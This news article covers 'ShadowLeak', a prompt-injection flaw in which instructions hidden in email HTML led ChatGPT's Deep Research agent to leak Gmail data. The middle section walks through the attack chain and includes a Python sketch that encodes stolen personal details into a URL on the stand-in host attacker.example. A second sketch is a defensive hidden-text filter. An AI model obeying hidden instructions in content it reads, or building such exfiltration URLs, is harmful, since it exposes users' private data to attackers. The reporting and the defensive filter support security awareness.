ChatGPT Vulnerability Allowed Email-Based Data Leaks

Security researchers discovered a ChatGPT vulnerability that allowed hidden email commands to manipulate the AI and leak sensitive data from connected services such as Gmail; OpenAI has since patched the flaw.

AI Security Breach: ChatGPT Manipulated Through Hidden Email Commands

Security researchers have uncovered a critical vulnerability in OpenAI's ChatGPT that allowed attackers to manipulate the AI chatbot through seemingly innocent emails, potentially leading to sensitive data leaks from connected services like Gmail.

The ShadowLeak Attack Method

Dubbed "ShadowLeak" by researchers at cybersecurity firm Radware, this sophisticated attack exploited ChatGPT's Deep Research Agent feature. The vulnerability, which has since been patched by OpenAI, involved embedding hidden commands within the HTML code of emails that appeared harmless to human recipients but were executable by ChatGPT.

When users connected ChatGPT to their Gmail accounts and instructed the AI to analyze their emails, the hidden prompts would trigger automatically. "This represents a new frontier in AI security threats where the attack surface extends beyond traditional endpoints," explained a Radware spokesperson.

How the Exploit Worked

The attack chain began with cybercriminals sending specially crafted emails to potential victims. These emails contained instructions hidden in their HTML markup, invisible to users but parsed by ChatGPT when it processed the email content. Once triggered, the hidden commands could instruct ChatGPT to extract sensitive information from the victim's Gmail account and transmit it to external servers controlled by attackers.
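The final hop, moving stolen text off the victim's account, can be as simple as smuggling it inside a URL the agent is told to visit. A brief sketch follows, assuming a hypothetical attacker endpoint (attacker.example), a made-up parameter name, and base64 encoding; the exact encoding used in the real attack may differ.

```python
import base64
from urllib.parse import quote

# Hypothetical illustration: personal details lifted from an inbox,
# encoded and appended to an attacker-controlled URL. The endpoint
# and parameter name are invented for this sketch.
stolen = "Jane Doe, jane.doe@example.com, employee ID 4412"
payload = base64.urlsafe_b64encode(stolen.encode()).decode()

# An injected prompt would direct the agent to fetch this URL, so the
# data leaves via an ordinary-looking web request from the AI's cloud.
exfil_url = f"https://attacker.example/collect?d={quote(payload)}"
print(exfil_url)
```

Because the request originates from the AI service rather than the victim's machine, nothing unusual ever crosses the victim's own network.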

What made this vulnerability particularly dangerous was its cloud-based nature. Unlike traditional attacks that target user devices, ShadowLeak operated entirely within ChatGPT's cloud environment, bypassing conventional security measures. The attack demonstrated how AI systems can be manipulated through indirect channels that traditional security protocols might not monitor effectively.
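One consequence is that defenses have to move to where the content is consumed. As a rough illustration of what a pre-filter might look for, the sketch below scans email HTML for styling tricks that hide text from human readers. The heuristics are our assumptions for illustration, not the mitigation OpenAI actually shipped.

```python
from html.parser import HTMLParser

# Assumed heuristics: inline styles commonly used to hide text from
# human readers while leaving it readable to a machine.
SUSPICIOUS_STYLES = ("display:none", "font-size:0", "color:#fff",
                     "color:white", "opacity:0")

class HiddenTextDetector(HTMLParser):
    """Flags elements whose inline style suggests hidden text."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Normalize the style attribute for simple substring checks.
        style = (dict(attrs).get("style") or "").replace(" ", "").lower()
        for marker in SUSPICIOUS_STYLES:
            if marker in style:
                self.findings.append((tag, marker))

def flag_hidden_text(html: str) -> list:
    detector = HiddenTextDetector()
    detector.feed(html)
    return detector.findings

# Example: an element styled to be invisible to a human reader.
sample = '<div style="font-size:0; color:white">do something covert</div>'
print(flag_hidden_text(sample))
# [('div', 'font-size:0'), ('div', 'color:white')]
```

A real filter would need to handle CSS classes, nested styles, and many more evasions, which is part of why this class of attack is hard to screen out reliably.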

Broader Implications for AI Security

While the demonstration focused on Gmail, researchers confirmed that similar vulnerabilities could affect other services integrated with ChatGPT's Deep Research Agent, including Outlook, Dropbox, Google Drive, and SharePoint. The discovery highlights the growing security challenges as AI systems become more deeply integrated with personal and enterprise data sources.

OpenAI responded promptly to the disclosure, implementing fixes that prevent such manipulation attempts. However, the incident serves as a stark reminder of the evolving threat landscape in the age of artificial intelligence. As AI systems handle increasingly sensitive tasks, ensuring their security against sophisticated manipulation techniques becomes paramount.

Security experts recommend that users remain cautious when connecting AI assistants to sensitive accounts and regularly review connected applications and permissions. The incident underscores the need for ongoing security research and proactive vulnerability management in AI systems.

Sebastian Ivanov

Sebastian Ivanov is a leading expert in technology regulations from Bulgaria, advocating for balanced digital policies that protect users while fostering innovation.
